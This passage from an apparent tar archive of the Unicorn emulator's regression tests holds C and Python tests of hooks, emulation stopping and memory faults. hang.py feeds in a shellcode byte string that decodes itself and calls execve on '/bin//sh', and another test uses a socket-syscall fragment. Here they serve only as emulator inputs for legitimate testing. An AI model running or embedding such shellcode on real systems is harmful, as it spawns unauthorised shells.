uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_reg_write: esp\n", count++); uint32_t ebp = 0x6000; err = uc_reg_write(uc, UC_X86_REG_EBP, &ebp); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_reg_write: ebp\n", count++); uc_hook h1; err = uc_hook_add(uc, &h1, UC_HOOK_MEM_UNMAPPED, cb_hookunmapped, NULL, 1, 0); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_hook_add\n", count++); // this should execute only a single instruction at 0x1000, because // that instruction accesses invalid memory. err = uc_emu_start(uc, 0x1000, 0x100F, 0, 0); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_emu_start\n", count++); // yes, not necessary, but to demonstrate the UC API is working as expected eip = 0x1004; err = uc_reg_write(uc, UC_X86_REG_EIP, &eip); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_reg_write: eip\n", count++); // this should execute the remaining instructions up to (but not includign) 0x100F. // currently, it returns an error about an unmapped read. // seems that this error should have been returned in the previous call // to emu_start. err = uc_emu_start(uc, 0x1004, 0x100F, 0, 0); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_emu_start\n", count++); fprintf(stderr, "ok %d - Done", count++); return 0; } ��������������������������������������unicorn-2.1.1/tests/regress/emu_clear_errors.py�����������������������������������������������������0000775�0000000�0000000�00000005602�14675241067�0021730�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from __future__ import print_function import binascii import regress from unicorn import * from unicorn.x86_const import * CODE = binascii.unhexlify(b"".join([ b"8B 74 01 28", # mov esi, dword ptr [ecx + eax + 0x28] mapped: 0x1000 b"03 F0", # add esi, eax 0x1004 b"8D 45 FC", # lea eax, dword ptr [ebp - 4] 0x1006 b"50", # push eax 0x1009 b"6A 40", # push 0x40 0x100A b"6A 10", # push 0x10 0x100C b"56", # push esi 0x100E b"FF 15 20 20 00 10" # call some address 0x100F ]).replace(" ", "")) def showpc(mu): pc = mu.reg_read(UC_X86_REG_EIP) print("pc: 0x%x" % (pc)) class HookCodeStopEmuTest(regress.RegressTest): def test_hook_code_stop_emu(self): mu = Uc(UC_ARCH_X86, UC_MODE_32) # base of CODE mu.mem_map(0x1000, 0x1000) mu.mem_write(0x1000, CODE) mu.reg_write(UC_X86_REG_EIP, 0x1000) # base of STACK mu.mem_map(0x4000, 0x4000) mu.mem_write(0x4000, "\x00" * 0x4000) mu.reg_write(UC_X86_REG_ESP, 0x6000) mu.reg_write(UC_X86_REG_EBP, 0x6000) mu.reg_write(UC_X86_REG_ECX, 0x0) mu.reg_write(UC_X86_REG_EAX, 0x0) def _hook(_, access, address, length, value, context): pc = mu.reg_read(UC_X86_REG_EIP) print("mem unmapped: pc: %x access: %x address: %x length: %x value: %x" % ( pc, access, address, length, value)) mu.emu_stop() return True mu.hook_add(UC_HOOK_MEM_UNMAPPED, _hook) # we only expect the following instruction to execute, # and it will fail, because it accesses unmapped memory. # mov esi, dword ptr [ecx + eax + 0x28] mapped: 0x1000 mu.emu_start(0x1000, 0x100F) showpc(mu) # now, we want to reuse the emulator, and keep executing # from the next instruction mu.reg_write(UC_X86_REG_EIP, 0x1004) self.assertEqual(0x1004, mu.reg_read(UC_X86_REG_EIP)) # we expect the following instructions to execute # add esi, eax 0x1004 # lea eax, dword ptr [ebp - 4] 0x1006 # push eax 0x1009 # push 0x40 0x100A # push 0x10 0x100C # push esi 0x100E # # currently, a UC_ERR_READ_UNMAPPED exception is raised here mu.emu_start(0x1004, 0x100F) showpc(mu) if __name__ == '__main__': regress.main() ������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/emu_stop_in_hook_overrun.c����������������������������������������������0000664�0000000�0000000�00000005503�14675241067�0023310�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Test for uc_emu_stop() in code hook not always stopping the emu at the current instruction. (Sometimes it will execute and stop at the next instruction). */ // windows specific #ifdef _MSC_VER #include <io.h> #include <windows.h> #include <process.h> #define PRIx64 "llX" #include <unicorn/unicorn.h> #ifdef _WIN64 #pragma comment(lib, "unicorn_staload64.lib") #else // _WIN64 #pragma comment(lib, "unicorn_staload.lib") #endif // _WIN64 // posix specific #else // _MSC_VER #include <unicorn/unicorn.h> #include "pthread.h" #endif // _MSC_VER // common includes #include <string.h> // Test MIPS little endian code. // This should loop forever. const uint64_t addr = 0x100000; const unsigned char test_code[] = { 0x00,0x00,0x00,0x00, // 100000: nop 0x00,0x00,0x00,0x00, // 100004: nop 0x00,0x00,0x00,0x00, // 100008: nop 0x00,0x00,0x00,0x00, // 10000C: nop }; bool test_passed_ok = false; // This hook is used to show that code is executing in the emulator. static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("Executing: %"PRIx64"\n", address); if( address == 0x100008 ) { printf("Stopping at: %"PRIx64"\n", address); uc_emu_stop(uc); } } int main(int argc, char **argv, char **envp) { uc_engine *uc; uc_err err; uc_hook hhc; uint32_t val; // Initialize emulator in MIPS 32bit little endian mode printf("uc_open()\n"); err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return err; } // map in a page of mem printf("uc_mem_map()\n"); err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL); if (err) { printf("Failed on uc_mem_map() with error returned: %u\n", err); return err; } // write machine code to be emulated to memory printf("uc_mem_write()\n"); err = uc_mem_write(uc, addr, test_code, sizeof(test_code)); if( err ) { printf("Failed on uc_mem_write() with error returned: %u\n", err); return err; } // hook all instructions by having @begin > @end printf("uc_hook_add()\n"); uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0); if( err ) { printf("Failed on uc_hook_add(code) with error returned: %u\n", err); return err; } // start executing code printf("uc_emu_start()\n"); uc_emu_start(uc, addr, addr+sizeof(test_code), 0, 0); // done executing, print some reg values as a test uc_reg_read(uc, UC_MIPS_REG_PC, &val); printf("pc is %X\n", val); test_passed_ok = val == 0x100008; // free resources printf("uc_close()\n"); uc_close(uc); if( test_passed_ok ) printf("\n\nTEST PASSED!\n\n"); else printf("\n\nTEST FAILED!\n\n"); return 0; } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/emu_stop_segfault.py����������������������������������������������������0000775�0000000�0000000�00000001050�14675241067�0022116�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python """See https://github.com/unicorn-engine/unicorn/issues/65""" import unicorn import regress class EmuStopSegFault(regress.RegressTest): def runTest(self): ADDR = 0x10101000 mu = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) mu.mem_map(ADDR, 1024 * 4) mu.mem_write(ADDR, b'\x41') mu.emu_start(ADDR, ADDR + 1, count=1) # The following should not trigger a null pointer dereference self.assertEqual(None, mu.emu_stop()) if __name__ == '__main__': regress.main() ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/ensure_typedef_consts_generated.py��������������������������������������0000775�0000000�0000000�00000000620�14675241067�0025023�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python """See https://github.com/unicorn-engine/unicorn/issues/161 Ensure that constants which are specified via a typedef, rather than an enum, are included in the bindings by the script for autogenerating mappings for constants. """ import unicorn try: unicorn.UC_HOOK_MEM_UNMAPPED except AttributeError: assert(False and "Definition for UC_HOOK_MEM_UNMAPPED not generated") ����������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/fpu_ip.py���������������������������������������������������������������0000775�0000000�0000000�00000003446�14675241067�0017666�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.x86_const import * from capstone import * import regress ESP = 0x2000 PAGE_SIZE = 2 * 1024 * 1024 # mov [esp], DWORD 0x37f # fldcw [esp] # fnop # fnstenv [esp + 8] # pop ecx CODE = b'\xc7\x04\x24\x7f\x03\x00\x00\xd9\x2c\x24\xd9\xd0\xd9\x74\x24\x08\x59' class SimpleEngine: def __init__(self): self.capmd = Cs(CS_ARCH_X86, CS_MODE_32) def disas_single(self, data): for i in self.capmd.disasm(data, 16): print("\t%s\t%s" % (i.mnemonic, i.op_str)) break disasm = SimpleEngine() def hook_code(uc, addr, size, user_data): mem = uc.mem_read(addr, size) print(" 0x%X:" % (addr)), disasm.disas_single(bytes(mem)) class FpuIP(regress.RegressTest): def mem_reader(self, mu, addr, size, expected): tmp = mu.mem_read(addr, size) for out, exp in zip(tmp, expected): self.assertEqual(exp, out) def test_32(self): mu = Uc(UC_ARCH_X86, UC_MODE_32) mu.mem_map(0x0, PAGE_SIZE) mu.mem_write(0x4000, CODE) mu.reg_write(UC_X86_REG_ESP, ESP) mu.hook_add(UC_HOOK_CODE, hook_code) mu.emu_start(0x4000, 0, 0, 5) esp = mu.reg_read(UC_X86_REG_ESP) self.assertEqual(0x2004, esp) expected = [0x0, 0x0, 0xa, 0x40] self.mem_reader(mu, esp + 14, 4, expected) def test_64(self): mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.mem_map(0x0, PAGE_SIZE) mu.mem_write(0x4000, CODE) mu.reg_write(UC_X86_REG_ESP, ESP) mu.hook_add(UC_HOOK_CODE, hook_code) mu.emu_start(0x4000, 0, 0, 5) rsp = mu.reg_read(UC_X86_REG_RSP) self.assertEqual(0x2012, rsp + 10) expected = [0x0, 0x0, 0xa, 0x40, 0x0, 0x0, 0x0, 0x0] self.mem_reader(mu, rsp + 10, 4, expected) if __name__ == '__main__': regress.main() ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/fpu_mem_write.py��������������������������������������������������������0000775�0000000�0000000�00000001727�14675241067�0021246�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.x86_const import * import regress ESP = 0x2000 PAGE_SIZE = 1 * 1024 * 1024 # wait # fnstcw word ptr [esp] # pop ecx CODE = b'\x9B\xD9\x3C\x24\x59' def hook_mem_write(uc, access, address, size, value, user_data): print("mem WRITE: 0x%x, data size = %u, data value = 0x%x" % (address, size, value)) return True class FpuWrite(regress.RegressTest): def mem_reader(self, mu, addr, size, expected): tmp = mu.mem_read(addr, size) for i, e in zip(tmp, expected): self.assertEquals(e, i) def runTest(self): mu = Uc(UC_ARCH_X86, UC_MODE_32) mu.mem_map(0, PAGE_SIZE) mu.mem_write(0, CODE) mu.reg_write(UC_X86_REG_ESP, ESP) mu.hook_add(UC_HOOK_MEM_WRITE, hook_mem_write) mu.emu_start(0x0, 5, 0, 2) esp = mu.reg_read(UC_X86_REG_ESP) self.mem_reader(mu, esp, 10, [0] * 10) if __name__ == '__main__': regress.main() �����������������������������������������unicorn-2.1.1/tests/regress/hang.py�����������������������������������������������������������������0000775�0000000�0000000�00000003343�14675241067�0017315�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from __future__ import print_function from unicorn import * from unicorn.x86_const import * import regress # callback for tracing instructions def hook_code(uc, address, size, user_data): tmp = uc.mem_read(address, size) print("[0x%x] =" %(address), end="") for i in tmp: print(" %02x" %i, end="") print("") # callback for tracing Linux interrupt def hook_intr(uc, intno, user_data): # only handle Linux syscall rip = uc.reg_read(UC_X86_REG_RIP) if intno != 0x80: print("=== 0x%x: got interrupt %x, quit" %(rip, intno)) uc.emu_stop() return eax = uc.reg_read(UC_X86_REG_EAX) print(">>> 0x%x: interrupt 0x%x, EAX = 0x%x" %(rip, intno, eax)) class Hang(regress.RegressTest): def runTest(self): binary1 = b'\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41\x41\x41\x41\x41' mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.mem_map(0, 2 * 1024 * 1024) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # handle interrupt ourself mu.hook_add(UC_HOOK_INTR, hook_intr) # setup stack mu.reg_write(UC_X86_REG_RSP, 1024 * 1024) # fill in memory with 0xCC (software breakpoint int 3) for i in xrange(1 * 1024): mu.mem_write(0 + i, b'\xcc') # write machine code to be emulated to memory mu.mem_write(0, binary1) self.assertEqual(mu.emu_start(0, len(binary1)), None) if __name__ == '__main__': regress.main() ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/hook_add_crash.py�������������������������������������������������������0000775�0000000�0000000�00000000637�14675241067�0021333�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python """https://github.com/unicorn-engine/unicorn/issues/165""" import unicorn def hook_mem_read_unmapped(mu, access, address, size, value, user_data): pass mu = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) try: for x in range(0, 1000): mu.hook_add(unicorn.UC_HOOK_MEM_READ_UNMAPPED, hook_mem_read_unmapped, None) except unicorn.UcError as e: print("ERROR: %s" % e) �������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/hook_code_add_del.py����������������������������������������������������0000775�0000000�0000000�00000002647�14675241067�0021774�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python '''https://github.com/unicorn-engine/unicorn/issues/334''' from __future__ import print_function import regress from unicorn import * from unicorn.x86_const import * ADDRESS = 0x8048000 STACK_ADDRESS = 0xffff000 STACK_SIZE = 4096 ''' 31 DB xor ebx, ebx 53 push ebx 43 inc ebx 53 push ebx 6A 02 push 2 6A 66 push 66h 58 pop eax 89 E1 mov ecx, esp CD 80 int 80h ''' CODE = "\x31\xDB\x53\x43\x53\x6A\x02\x6A\x66\x58\x89\xE1\xCD\x80" EP = ADDRESS + 0x54 def hook_code(mu, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) class HookCodeAddDelTest(regress.RegressTest): def runTest(self): emu = Uc(UC_ARCH_X86, UC_MODE_32) emu.mem_map(ADDRESS, 0x1000) emu.mem_write(EP, CODE) emu.mem_map(STACK_ADDRESS, STACK_SIZE) emu.reg_write(UC_X86_REG_ESP, STACK_ADDRESS + STACK_SIZE) # UC_HOOK_CODE hook will work even after deletion i = emu.hook_add(UC_HOOK_CODE, hook_code, None) emu.hook_del(i) emu.emu_start(EP, EP + len(CODE), count = 3) print("EIP: 0x%x" % emu.reg_read(UC_X86_REG_EIP)) if __name__ == '__main__': regress.main() �����������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/hook_code_stop_emu.py���������������������������������������������������0000775�0000000�0000000�00000005215�14675241067�0022245�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from __future__ import print_function import binascii import regress from unicorn import * from unicorn.x86_const import * CODE = binascii.unhexlify(b"".join([ b"48c7c003000000", # mov rax, 3 mapped: 0x1000 b"0f05", # syscall mapped: 0x1007 b"48c7c700400000", # mov rdi, 0x4000 mapped: 0x1009 b"488907", # mov [rdi], rdx mapped: 0x1010 b"488b07", # mov rdx, [rdi] mapped: 0x1013 b"4883c201", # add rdx, 1 mapped: 0x1016 ])) class SingleStepper: def __init__(self, emu, test): self._emu = emu self._hit_count = 0 self._test = test def _stop_hook(self, uc, address, *args, **kwargs): if self._hit_count == 0: self._hit_count += 1 else: self._test.assertEqual(1, self._hit_count, "HOOK_CODE invoked too many times") uc.emu_stop() def step(self): self._hit_count = 0 h = self._emu.hook_add(UC_HOOK_CODE, self._stop_hook) try: pc = self._emu.reg_read(UC_X86_REG_RIP) self._emu.emu_start(pc, pc+0x20) finally: self._emu.hook_del(h) def showpc(mu): pc = mu.reg_read(UC_X86_REG_RIP) print("pc: 0x%x" % (pc)) class HookCodeStopEmuTest(regress.RegressTest): def test_hook_code_stop_emu(self): try: mu = Uc(UC_ARCH_X86, UC_MODE_64) # base of CODE mu.mem_map(0x1000, 0x1000) mu.mem_write(0x1000, CODE) # scratch, used by CODE mu.mem_map(0x4000, 0x1000) mu.reg_write(UC_X86_REG_RDX, 0x1) mu.reg_write(UC_X86_REG_RIP, 0x1000) # 0x1000: 48c7c003000000 mov rax, 3 # 0x1007: 0f05 syscall # 0x1009: 48c7c700400000 mov rdi, 0x4000 # 0x1010: 488907 mov [rdi], rdx # 0x1013: 488b07 mov rdx, [rdi] # 0x1016: 4883c201 add rdx, 1 stepper = SingleStepper(mu, self) showpc(mu) self.assertEqual(0x1000, mu.reg_read(UC_X86_REG_RIP), "Unexpected PC") stepper.step() showpc(mu) self.assertEqual(0x1007, mu.reg_read(UC_X86_REG_RIP), "Emulator failed to stop after one instruction") stepper.step() showpc(mu) self.assertEqual(0x1009, mu.reg_read(UC_X86_REG_RIP), "Emulator failed to stop after one instruction") except UcError as e: self.assertFalse(0, "ERROR: %s" % e) if __name__ == '__main__': regress.main() �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/hook_extrainvoke.c������������������������������������������������������0000664�0000000�0000000�00000005277�14675241067�0021556�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <stdlib.h> #include <stdio.h> #include <unicorn/unicorn.h> #define X86_CODE32 "\xf3\xab" // rep stosd dword ptr es:[edi], eax -> Fill (E)CX doublewords at ES:[(E)DI] with EAX #define ADDRESS 0x1000000 #define ECX_OPS 2 static long unsigned int hook_called = 0; void hook_ins(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { hook_called++; printf("hook called\n"); } static void VM_exec(void) { uc_engine *uc; uc_err err; uc_hook trace; unsigned int r_eax, eflags, r_esp, r_edi, r_ecx; r_eax = 0xbaadbabe; r_esp = ADDRESS+0x20; r_edi = ADDRESS+0x300; //some safe distance from main code. eflags = 0x00000206; r_ecx = ECX_OPS; // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if(err) { printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err)); return; } err = uc_mem_map(uc, ADDRESS, (2 * 1024 * 1024), UC_PROT_ALL); if(err != UC_ERR_OK) { printf("Failed to map memory %s\n", uc_strerror(err)); return; } // write machine code to be emulated to memory err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1); if(err != UC_ERR_OK) { printf("Failed to write emulation code to memory, quit!: %s(len %lu)\n", uc_strerror(err), (unsigned long)sizeof(X86_CODE32) - 1); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); uc_reg_write(uc, UC_X86_REG_EDI, &r_edi); uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_ESP, &r_esp); //make stack pointer point to already mapped memory so we don't need to hook. uc_reg_write(uc, UC_X86_REG_EFLAGS, &eflags); uc_hook_add(uc, &trace, UC_HOOK_CODE, (void *)hook_ins, NULL, 1, 0); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0); if(err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); uc_close(uc); return; } uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDI, &r_edi); uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags); uc_close(uc); printf("\n>>> Emulation done. Below is the CPU context\n"); printf(">>> EAX = 0x%08X\n", r_eax); printf(">>> ECX = 0x%08X\n", r_ecx); printf(">>> EDI = 0x%08X\n", r_edi); printf(">>> EFLAGS = 0x%08X\n", eflags); printf("\nHook called %lu times. Test %s\n", hook_called, (hook_called == ECX_OPS ? "PASSED!!" : "FAILED!!!")); } int main(int argc, char *argv[]) { VM_exec(); return 0; } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/hook_raises_exception.py������������������������������������������������0000664�0000000�0000000�00000002200�14675241067�0022750�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������import regress from unicorn import Uc, UC_ARCH_X86, UC_MODE_64, UC_HOOK_CODE CODE = b"\x90" * 3 CODE_ADDR = 0x1000 class HookCounter(object): """Counts number of hook calls.""" def __init__(self): self.hook_calls = 0 def bad_code_hook(self, uc, address, size, data): self.hook_calls += 1 raise ValueError("Something went wrong") def good_code_hook(self, uc, address, size, data): self.hook_calls += 1 class TestExceptionInHook(regress.RegressTest): def test_exception_in_hook(self): uc = Uc(UC_ARCH_X86, UC_MODE_64) uc.mem_map(CODE_ADDR, 0x1000) uc.mem_write(CODE_ADDR, CODE) counter = HookCounter() uc.hook_add(UC_HOOK_CODE, counter.good_code_hook, begin=CODE_ADDR, end=CODE_ADDR + len(CODE)) uc.hook_add(UC_HOOK_CODE, counter.bad_code_hook, begin=CODE_ADDR, end=CODE_ADDR + len(CODE)) self.assertRaises(ValueError, uc.emu_start, CODE_ADDR, CODE_ADDR + len(CODE)) # Make sure hooks calls finish before raising (hook_calls == 2) self.assertEqual(counter.hook_calls, 2) if __name__ == "__main__": regress.main() ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/hook_readonly_write_local.py��������������������������������������������0000775�0000000�0000000�00000001372�14675241067�0023621�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.x86_const import * import regress PAGE_SIZE = 4 * 1024 ACCESS_ADDR = 0x1000 # mov eax, [0x1000] # mov eax, [0x1000] CODE = b'\xA1\x00\x10\x00\x00\xA1\x00\x10\x00\x00' def hook_mem_read(uc, access, address, size, value, data): print("Reading at " + str(address)) uc.mem_write(address, CODE) class REP(regress.RegressTest): def test_rep(self): mu = Uc(UC_ARCH_X86, UC_MODE_32) mu.mem_map(0, PAGE_SIZE) mu.mem_write(0, CODE) mu.mem_map(ACCESS_ADDR, PAGE_SIZE, UC_PROT_READ) mu.hook_add(UC_HOOK_MEM_READ, hook_mem_read, begin = ACCESS_ADDR, end = ACCESS_ADDR + PAGE_SIZE) mu.emu_start(0, len(CODE)) if __name__ == '__main__': regress.main() ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/init.py�����������������������������������������������������������������0000775�0000000�0000000�00000004446�14675241067�0017350�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python # By Mariano Graziano from unicorn import * from unicorn.x86_const import * import regress, struct mu = 0 class Init(regress.RegressTest): def init_unicorn(self, ip, sp, counter): global mu #print "[+] Emulating IP: %x SP: %x - Counter: %x" % (ip, sp, counter) mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.mem_map(0x1000000, 2 * 1024 * 1024) mu.mem_write(0x1000000, "\x90") mu.mem_map(0x8000000, 8 * 1024 * 1024) mu.reg_write(UC_X86_REG_RSP, sp) content = self.generate_value(counter) mu.mem_write(sp, content) self.set_hooks() def generate_value(self, counter): start = 0xffff880026f02000 offset = counter * 8 address = start + offset return struct.pack("<Q", address) def set_hooks(self): global mu mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, self.hook_mem_invalid) mu.hook_add(UC_HOOK_MEM_FETCH_UNMAPPED, self.hook_mem_fetch_unmapped) def hook_mem_invalid(self, uc, access, address, size, value, user_data): global mu print "[ HOOK_MEM_INVALID - Address: %s ]" % hex(address) if access == UC_MEM_WRITE_UNMAPPED: print ">>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" %(address, size, value) address_page = address & 0xFFFFFFFFFFFFF000 mu.mem_map(address_page, 2 * 1024 * 1024) mu.mem_write(address, str(value)) return True else: return False def hook_mem_fetch_unmapped(self, uc, access, address, size, value, user_data): global mu print "[ HOOK_MEM_FETCH - Address: %s ]" % hex(address).strip("L") print "[ mem_fetch_unmapped: faulting address at %s ]" % hex(address).strip("L") mu.mem_write(0x1000003, "\x90") mu.reg_write(UC_X86_REG_RIP, 0x1000001) return True def runTest(self): global mu ips = list(xrange(0x1000000, 0x1001000, 0x1)) sps = list(xrange(0x8000000, 0x8001000, 0x1)) j = 0 for i in ips: j += 1 index = ips.index(i) self.init_unicorn(i, sps[index], j) mu.emu_start(0x1000000, 0x1000000 + 0x1) if __name__ == '__main__': regress.main() ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/invalid_read_in_cpu_tb_exec.c�������������������������������������������0000664�0000000�0000000�00000001776�14675241067�0023646�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("hook_block(%p, %"PRIx64", %d, %p)\n", uc, address, size, user_data); } /* * Disassembly according to capstone: * add byte ptr [rip - 1], 0x30 * jmp 0x1000000 */ #define BINARY "\x80\x05\xff\xff\xff\xff\x30\xeb\xf7\x30" #define MEMORY_SIZE 2 * 1024 * 1024 #define STARTING_ADDRESS 0x1000000 int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(UC_ARCH_X86, UC_MODE_64, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, STARTING_ADDRESS, MEMORY_SIZE, UC_PROT_ALL); if (uc_mem_write(uc, STARTING_ADDRESS, BINARY, sizeof(BINARY) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } uc_hook hook; uc_hook_add(uc, &hook, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); printf("uc_emu_start(…)\n"); uc_emu_start(uc, STARTING_ADDRESS, STARTING_ADDRESS + sizeof(BINARY) - 1, 0, 20); printf("done\n"); return 0; } ��unicorn-2.1.1/tests/regress/invalid_read_in_tb_flush_x86_64.c���������������������������������������0000664�0000000�0000000�00000001473�14675241067�0024204�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define HARDWARE_ARCHITECTURE UC_ARCH_X86 #define HARDWARE_MODE UC_MODE_64 #define MEMORY_STARTING_ADDRESS 0x1000000 #define MEMORY_SIZE 2 * 1024 * 1024 #define MEMORY_PERMISSIONS UC_PROT_READ #define BINARY_CODE "\x90" int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 20); printf("done\n"); return 0; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/invalid_write.py��������������������������������������������������������0000775�0000000�0000000�00000002616�14675241067�0021242�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Test callback that returns False to cancel emulation from __future__ import print_function from unicorn import * from unicorn.x86_const import * import regress X86_CODE32_MEM_WRITE = b"\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov [0xaaaaaaaa], ecx; INC ecx; DEC edx # callback for tracing invalid memory access (READ or 